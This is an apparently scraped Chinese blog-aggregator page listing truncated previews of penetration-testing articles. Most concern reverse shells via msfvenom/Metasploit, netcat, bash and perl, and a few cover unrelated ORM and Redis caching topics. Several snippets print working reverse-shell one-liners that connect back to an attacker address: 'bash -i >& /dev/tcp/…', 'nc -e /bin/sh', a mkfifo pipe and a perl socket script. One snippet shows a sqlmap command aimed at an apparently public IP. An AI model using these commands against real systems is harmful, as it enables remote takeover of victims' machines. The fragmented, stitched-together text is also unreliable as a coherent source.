靶机地址:windows 192.168.1.84 攻击者地址:192.168.20.44 kali 在kali当中生成脚本 msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.20.44 lport=7070 -f exe -o /t ...            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2021-09-14 14:25:00
                            
                                543阅读
                            
                                                                                    
                                2评论
                            
                                                 
                 
                
                             
         
            
            
            
            准备:假设内网有一台2003服务器(使用mssql数据库,存在注入点),把网页服务80端口映射到防火墙8092端口,外网一台centos用来接收反弹shell工具:sqlmap、msf、apache一、访问映射到外网的8092端口,web服务器寻找注入点测试页面存在注入点使用sqlmap进行注入sqlmap -u "http://61.136.208.30:8092/Content.aspx?Cl            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2023-10-08 18:53:44
                            
                                86阅读
                            
                                                                             
                 
                
                                
                     
                                    
                             
         
            
            
            
            上周我在twitter上讨论了ORM,在那以后有人希望我澄清一下。事实上,我曾经写文章讨论过ORM, 但那是时的上下文是关于SQL的,我不应该把这将两件事情混为一谈。因此,在本文中我将集中讨论ORM本身。同时,我尽力保持简洁,因为我从自己的SQL文章中发现:人们一旦读到让他们发怒的内容就很容易离开(同时留下一句评论,而不论他们所关注的东西是否在后面会讨论到)。什么是反模式?我很高兴地发现            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2024-07-12 13:51:04
                            
                                46阅读
                            
                                                                             
                 
                
                                
                     
                                    
                             
         
            
            
            
            MSF知道MySQL反弹Shell
在网络安全领域中,渗透测试是一项重要的工作,它可以帮助组织评估其网络系统的安全性。一种常见的渗透测试技术是通过利用漏洞来获取目标系统的控制权。在此过程中,Metasploit Framework(MSF)是一个常用的工具,它可以帮助渗透测试人员快速发现、利用和管理漏洞。
本文将介绍如何使用MSF知道MySQL反弹Shell的技术。首先,让我们了解一下反弹Sh            
                
                    
                        
                                                            
                                                                        
                                                                                        原创
                                                                                    
                            2024-01-18 09:44:27
                            
                                280阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            # 如何实现 Redis 用 Metasploit Framework(MSF)反弹 Shell
在这篇文章中,我们将介绍如何利用 Redis 服务与 Metasploit Framework 结合实现反弹 Shell。对于刚入行的小白来说,这个过程可能会显得复杂,但只要按照步骤进行,就会变得简单明了。以下是整个流程的概览。
## 整体流程
| 步骤 | 描述 |
| --- | --- |            
                
         
            
            
            
            前言window本地漏洞提权,是指利用Windows系统本地进程或系统服务的漏洞,将普通用户权限(Sql Server、.net framework)权限提示至system权限提权的原理当你使用当前用户的权限来创建的shell通信,你当前的shell就是什么权限,就好像你使用管理员运行一个木马文件,对方获得权限就是管理员,而Windows本地溢出就是利用system权限的缺陷开启shell进程,相            
                
         
            
            
            
            msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一个“一体化”的集中控制台,并允许您高效地访问MSF中几乎所有可用的选项。MSFconsole一开始可能看起来有些吓人,但是一旦您了解了命令的语法,您就会了解利用这个接口的强大功能。实验环境:Windows Server 2008 R2 x64kali模拟实验:首先输入msfconsole打开软...            
                
                    
                        
                                                            
                                                                        
                                                                                        原创
                                                                                    
                            2021-06-18 14:42:52
                            
                                4588阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一个“一体化”的集中控制台,并允许您高效地访问MSF中几乎所有可用的选项。MSFconsole一开始可能看起来有些吓人,但是一旦您了解了命令的语法,您就会了解利用这个接口的强大功能。            
                
                    
                        
                                                            
                                                                        
                                                                                        原创
                                                                                    
                            2022-04-22 06:41:10
                            
                                4042阅读
                            
                                                                             
                 
                
                                
                     
                                    
                             
         
            
            
            
            Redis击穿,穿透,雪崩讲解前言: 前面几个博客从redis在Linux上进行部署到实现集群:主从复制、哨兵模式、cluster集群,但是呢这些集群虽然能够保证redis的高可用,不免也会遇到一些故障就好比击穿,穿透,雪崩等等,这三种都会可能成为我们系统的漏洞下面我简单的讲一下他们三个分别是什么意思。击穿: 某时间段中击穿指的是客户端向服务器发送单个key的查询请求被高并发访问,缓存失效,请求都            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2023-09-28 16:36:05
                            
                                15阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            以anced_c...            
                
                    
                        
                                                            
                                                                        
                                                                                        原创
                                                                                    
                            2023-06-09 10:41:54
                            
                                475阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            网络安全渗透(WIFI)By:edolf时间:21-12-8简介:这是一篇关于无线网络的(WIFI)的渗透教程理解基础关于路由器无线路由发展标准历史协议标准发布时间频段描述802.1119992.4GHz定义微波和红外线的物理层和MAC子层802.11a1999-095GHz定义了微波物理层及MAC子层802.11b1999-092.4GHz物理层补充DSSS802.11b+20022.4GHz物            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2023-10-18 19:46:54
                            
                                21阅读
                            
                                                                             
                 
                
                                
                     
                                    
                             
         
            
            
            
            # 利用netcat反弹shellNetcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或工具。 使用它你可以轻易的建立任何连接。目前,默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -e 都被阉割了            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2023-12-28 14:14:49
                            
                                398阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2024-04-01 00:57:24
                            
                                80阅读
                            
                                                                             
                 
                
                                
                     
                                    
                             
         
            
            
            
            bash:bash-i>&/dev/tcp/10.0.0.1/80800>&1~~perl:perl-e'useSocket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2018-06-02 17:47:52
                            
                                614阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            netcat 一句话反弹 获取shell(想反弹谁的shell就在谁的后面加-e /bin/sh或-e /bin/bash) 正向shell: 客户端主动连接服务器并获取服务器shell 客户端主动连接并得到反弹shell nc 服务端ip 8888 服务端监听连接 nc -lvp 8888 -e  ...            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2021-10-14 19:23:00
                            
                                803阅读
                            
                                                                                    
                                2评论
                            
                                                 
                 
                
                             
         
            
            
            
            前言  Linux下,一条bash命令就可以反弹出shell。之前不求甚解的复现,突然有了一个疑问,为什么这样就能实现shell反弹?又重新学习了一下bash,这是一篇关于bash反弹原理的介绍。  反弹shell命令如下  受害者:bash -i >& /dev/tcp/ip/port 0>&1  攻击者nc -lvp port反弹 shell 的本质  接下来依次解            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2024-01-21 05:16:12
                            
                                48阅读
                            
                                                                             
                 
                
                                
                     
                                    
                             
         
            
            
            
            shell的概念简单来说,Shell 就是实现用户命令的接口,通过这个接口我们就能实现对计算机的控制,比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制。比如说,我们有两台主机 A、B,我们最终想实现在 A 上控制 B。那么如果用正向 Shell,其实就是在 A 上输入 B 的连接地址,比如通过 ssh 连接到 B,连接成功之后,我们就可以在 A 上通过命令控制 B 了。            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2024-08-21 19:43:02
                            
                                84阅读
                            
                                                                             
                 
                
                                
                     
                                    
                             
         
            
            
            
            0x00 反弹shell概述反弹shell:即reverse shell,在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,通过反弹的shell去远程控制服务器。0x01 反弹shell原因通常由于防火墙、权限不足、端口占用等情况下,无法直接连接目标主机,此时就需要通过反弹shell,让目标主机主动来连接我们再公网的vps。0x02 Linux下反弹shell实验            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2024-05-13 13:38:47
                            
                                244阅读
                            
                                                                             
                 
                
                                
                     
                                    
                             
         
            
            
            
            #clientnc -vlp <port>#server#ncnc -e /bin/sh <target IP> <port>nc.exe -e C:\WINDOWS\system32\cmd.exe <target IP> <port>mkfifo bd;cat bd | /bin/sh -i 2>&1 | nc <            
                
                    
                        
                                                            
                                                                        
                                                                                        原创
                                                                                    
                            2022-02-20 17:15:02
                            
                                280阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            正向shell靶机nc -lvp 7777 -e /bin/bash攻击机nc ip 7777反向shell1. 操作步骤环境攻击端:192.168.31.199靶机:192.168.31.91ubuntu或者CentOS上面输入nc -lvp 7777 -e /bin/bashkali上输入nc ip 7777攻击端监听端口nc -lvp 7777靶机生成一个反弹shellbash -i >            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2021-04-28 13:01:17
                            
                                700阅读
                            
                                                                                    
                                2评论